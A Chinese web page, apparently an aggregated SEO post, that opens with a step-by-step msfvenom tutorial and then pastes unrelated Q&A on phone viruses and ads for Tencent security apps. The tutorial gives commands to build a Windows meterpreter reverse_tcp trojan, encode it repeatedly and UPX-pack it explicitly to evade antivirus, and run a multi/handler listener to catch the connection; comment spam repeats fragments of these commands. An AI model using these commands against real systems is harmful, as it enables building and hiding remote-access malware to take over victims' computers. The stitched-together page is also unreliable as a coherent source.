您现在的位置是：首页 > 最近新闻 > 正文

msfapk植入木马病毒（木马病毒植入教程）

msfapk植入木马病毒

hacker2022-05-29 15:28:23最近新闻155

本文导读目录：1、如何用msfvenom生成木马程序2、

本文导读目录：

1、如何用msfvenom生成木马程序

2、apk文件是木马病毒，传到电脑里，被检测出来了，可以不删除吗？不删对电脑系统有危害吗？

3、apk软件如果有木马病毒,在电脑上安全软件能查出来吗

4、手机被植入木马程序该怎么办？

5、手机被植入木马病毒如何处理

如何用msfvenom生成木马程序

一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.

二,工具:MSF

三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

四,过程:

1,查看帮助

命令: root# msfvenom -h

结果:

2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o

结果:

3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe abc.exe

注:如果只是用msfpayload生成,简单示例:

命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X Desktop/abc.exe

多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe

upx加壳：upx -5 /root/Desktop/acn.exe

结果:

说明: -p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

4,把生成的abc.exe放到win7下.执行.

5,在命令行下,打开msfconsole.

命令: root # msfconsole

6,本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: msf use exploit/multi/handler

Msf exploit(handler) set payload windows/meterpreter/reverset_tcp

结果:

7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.

8,.验证

apk文件是木马病毒，传到电脑里，被检测出来了，可以不删除吗？不删对电脑系统有危害吗？

没有运行的病毒是不会对系统和其它软件产生危害的。

没有运行，那么它就只是一段占据了部分存储空间的数据而已。

再加上APK格式的文件，只能在手机安卓系统的环境下运行，并不能在Windows系统环境下运行，对电脑是没有影响的。

不删除其实也没什么关系的。

msfapk植入木马病毒

apk软件如果有木马病毒,在电脑上安全软件能查出来吗

您好，理论上可以检查出来。

如果软件有毒，但是又不得不用，您可以在杀毒软件的安全沙箱中运行。

腾讯电脑管家企业平台：http://zhidao.baidu.com/c/guanjia/

手机被植入木马程序该怎么办？

很多手机病毒会伪装为正常软件或者诱惑性名称，若怀疑手机中存在木马或者病毒，一般的表现是手机自动下载其他推广软件、手机卡顿发热、出现有遮挡的广告等。请尝试按照以下步骤进行清除：

请尝试安装一款安全软件（例如：手机管家等）。以手机管家为例，打开手机管家，点击主界面上的一键体检即可自动检测手机中存在的问题，并且给出处理建议，点击一键清除即可删除病毒程序。

若重启手机发现病毒依然存在或者提示无法删除，请先获取ROOT权限再进行深度查杀，获取ROOT可以使用电脑端的一键ROOT工具进行。

手机被植入木马病毒如何处理

这个可以安装杀毒软件杀毒，我一直用的腾讯手机个就不错。

它可以自动更新病毒库，杀毒防护二合一。我的手机也是安卓系统的，

之前换了几个杀毒软件了，现在一直用的是腾讯手机管家，用来用去，

还是觉得他比较符合我的口味，功能齐全，杀毒方便，你也可以多试几个，总有一个适合你。腾讯手机管家能有效清除侵入您手机中的恶意软件和病毒。

发表评论

评论列表

弦久橘亓（2022-05-30 01:44:28）回复取消回复

程序该怎么办？很多手机病毒会伪装为正常软件或者诱惑性名称，若怀疑手机中存在木马或者病毒，一般的表现是手机自动下载其他推广软件、手机卡顿发热、出现有遮挡的广告等。请尝试按照以下步骤进行清除：请尝试安装一款安全软件（例如：手机管家等）。以手机管家为例，打开手机管家，点击主界面上的一键体检即

离鸢戈亓（2022-05-29 16:54:46）回复取消回复

ndows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t r

断渊南简（2022-05-29 18:35:11）回复取消回复

ST,LPORT 监听上线的主机IP和端口-f exe 生成EXE格式4,把生成的abc.exe放到win7下.执行.5,在命令行下,打开msfconsole.命令: root

绿邪性许（2022-05-29 23:07:23）回复取消回复

ORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口命令: root# msfven

冢渊掩灼（2022-05-30 01:12:50）回复取消回复

443.所以最后连接会通向192.168.1.113的443端口命令: root# msfvenom -p windows/meterpreter/reverse_

b2c信息网

最近新闻